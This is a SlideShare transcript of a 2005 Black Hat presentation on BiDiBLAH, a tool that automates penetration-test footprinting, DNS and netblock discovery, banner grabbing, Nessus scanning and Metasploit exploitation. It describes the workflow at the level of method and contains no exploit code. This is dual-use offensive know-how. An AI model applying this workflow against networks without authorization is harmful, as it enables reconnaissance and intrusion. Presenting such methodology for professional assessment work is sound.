Your SlideShare is downloading. ×
0
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Sensepost assessment automation
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Sensepost assessment automation

420

Published on

Pressentaion by Roelof Temmingh at blackhat USA in 2005. …

Pressentaion by Roelof Temmingh at blackhat USA in 2005.

This presentation is about the methodology behind the bidiblah tool. A tool developed by Roelof Temmingh which automates the foot-printing and discovery process.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
420
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
6
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Assessment automation:Deux ex Machina ||Rube GoldbergMachine?2005LAS VEGAS
  • 2. • Before we begin….you can find all of this at:• http://www.sensepost.com/research/bidiblah• As promised at Amsterdam…E-Or release!• http://www.sensepost.com/research/eor• (web application scanner)• Time considerations…• Shows in Vegas…
  • 3. IntroductionSensePost has done hundreds of external assessmentTried and trusted methodologySo…in search of an automated assessment toolThis talk is about:• What is this methodology?• Can it be automated?• Where does automation really work well?• Where does it simply suck?• Why does it fail? (and can it be corrected?)• Implications for penetration testers
  • 4. Principles of automationTo have an automatic process we need to code itTo code it we need to have an algorithm or flowIn order to have an algorithm or flow it we need tounderstand the processTo understand the process we need to have done itmany timesIf you cannot write the process down on paper youprobably don’t understand it completelyExceptions on the rule – the root of all evilTradeoffs – if it will work in 99.99% of cases andwill take me 2 months to code support for the 0.01%of cases…is it worth it?
  • 5. Weird perceptionsUnix good….Windows baaaad! (meeaaaaa)‘Hard core’ hackers will tell you that Windows sucks.GUI apps limit you to do complex thingsProblem is not the OS – it’s the implementation of the GUIPeople think that, because it’s a GUI app, it needs to be “dumbed down”People think that, because it’s a GUI app, it needs to user friendlyPeople think that, because it’s a GUI app, stupid people will use itUnix command line tools are mostly “fire and forget”Unix command line tools are not interactiveUnix makes it hard to write X11 interfaces – so ppl stick to text basedinterfacesBiDiBLAH uses “hot” text boxes – you can copy and paste & grep andawk and sed all you wish
  • 6. The demos you are about to see…BiDiBLAH is a tool for doing attacks/assessments Its built for large networks …we don’t have a large network …but our clients do …but we don’t want to show their network …no...we don’t…really… SO: Passive: IBM,Playboy Active: SensePost/VMWare There’s just too much risk in doing this live …but everything you see is real (some time lapse in places – I’ll tell you where)
  • 7. SensePost external methodology
  • 8. Methodology: Footprinting
  • 9. Methodology:Footprint:Find domains Initial domain TLD expansion Name expansion Related domains Content matching Network (MX/NS/IP) matching Meta data Final domain matching list
  • 10. Methodology: Footprinting: Find subdomains
  • 11. Video 1 – BiDiBLAH’s footprinting : Sub domains (5 minutes)
  • 12. Methodology: Footprinting: Forward DNS entries Domain / subdomain MX/NS records ZT possible? Hit lists yes Perform forward All forwards
  • 13. Video 2 – BiDiBLAH’s footprinting : Forwards (3min per domain)
  • 14. Methodology: Footprint: Netblocks
  • 15. Video 3 – BiDiBLAH footprinting : NetBlocks
  • 16. Methodology: Footprint: Reverse DNS
  • 17. Video 4 – BiDiBLAH’s footprinting : Reverse DNS (5min/ClassC)
  • 18. Methodology: Footprint: Vitality
  • 19. Vitality : Async scanning
  • 20. Video 5 - BiDiBLAH – Vitality (SensePost network) 2min/port/classB
  • 21. Automation of footprintPheeww…glad that’s over!Which steps are difficult to automate & why? • Domain finding • works semi OK, but never complete [not implemented] • currently, you can learn a lot from reverse entries • Sub domain finding – easy - [DONE] • Forwards – easy - [DONE] • Netblocks – difficult… • AS expansion is not always good for smaller (hosted) blocks. • Whois info on these blocks are pretty unless. • No standard interface to registrars • [Currently set to manual] • Reverse scans – easy - [DONE] • Vitality – easy [DONE (tcp only)]
  • 22. Why should you care about footprinting?? Finding one vulnerability on one box vsFinding the one box with one vulnerability…
  • 23. SensePost external methodology So, where are we now?
  • 24. Methodology: FingerprintingOS detection from the Internet to a firewalled host isdifficult…Not just technically, but conceptually :An Apache box protected by a FireWall-1 running on Win32 and 1:1NAT will reportitself as a Windows machines on a network level…but as a Unix machine on applevel..so what will it be??BiDiBLAH does not try to do OS detection, but rather just do banner grabbingUsing Async banner grabbing for 21,22,25,80,110,143Multithreaded 443 (SSL)Any banner/version can be grabbed asynchronously butit gets increasingly tricky..
  • 25. Async banner grabbing – the process
  • 26. Video 6 - BiDiBLAH: Async banner grabbing (2000 banners / 3 min)
  • 27. SensePost external methodology So, where are we now?
  • 28. Methodology: targetingWith a great deal of potential targets, we want to be able to select only those that really interests us.Targetting system should be able to target using• Certain/All open ports (in all netblocks, or certain netblocks) • – e.g. all open on TCP 53• Keywords in service banners • – e.g. wuftp*• Keywords in DNS names • – e.g. PRT*• All hosts in a specific netblock • – e.g. all in 172.16.43.0/24• Particular OSes of version of OS [a problem - we don’t have it] • - e.g. MS Windows XP SP1• Certain keywords within vulnerability descriptions (later more) • - e.g. RPC*
  • 29. Video 7 – BiDiBLAH - Targeting
  • 30. SensePost external methodology So, where are we now?
  • 31. Methodology: Vulnerability discoveryWhy reinvent the wheel? Use a solid, widely used scanner:Nessus…Thus…we write a Nessus client..Give the user the ability to choose a set of plugins..and let him save the list..Thus – you can choose *all* plugins (if you are doing anassessment), or you can choose one plugin (if you are lookingthroughout your whole network for a particular problem)Scans are executed against what was marked as targets
  • 32. Video 8 - BiDiBLAH: Plugin selection
  • 33. Video 9 – BiDiBLAH vulnerability discovery
  • 34. SensePost external methodology So, where are we now?
  • 35. Methodology: Vulnerability exploitationWhy reinvent the wheel? Use a solid, widely used exploitationframework: MetaSploit!Thus…we write a MetaSploit client..Problem with MetaSploit – its very operating system specific….and we DON’T KNOW the OS…Don’t specify target and hope for the best – hopefully it will bruteforce.Use Nessus to identify the weakness, MetaSploit to exploit itThus … we need a NessusID to MetaSploit sploit name listWe built it (thanks GP), and wrote plugins as neededHopefully it can be an attribute of the sploit (looks at HD..)RHOST, SSL, LHOST – all known to usRPORT known via Nessus scannerLet the user choose the playload and additional parameters
  • 36. Video 10 – BiDiBLAH exploitaion (VMware server)
  • 37. SensePost external methodology So…we are done? In a perfect world…yes...In the real world we have false positives, we have to moderate Nessus results, and we have to write !=*|||(ing reports!!!
  • 38. Video 11 - advance targeting and reporting
  • 39. The Bottom lineBiDiBLAH does 80% of the work within 20% of time it takes usThe last 20% of the work takes 80% of the project timeSome steps in the methodology are really hard to automateThis is usually where things are “non-standard”, or an exceptionIt would hopefully raise the bar on mediocre “pen testing” companies Release considerationsGroup1: “Surely you will not release this to the world – you armingscript kiddies with dangerous point and click hacking tools!!?Group2: “Where do we download it?Thus: crippled version (20min run time, no save) released at http://www.sensepost.com/research/bidiblah Full version available on request
  • 40. EXTRA: E-Or releaseWeb APPLICATION assessment tool•http://www.sensepost.com/research/eor

×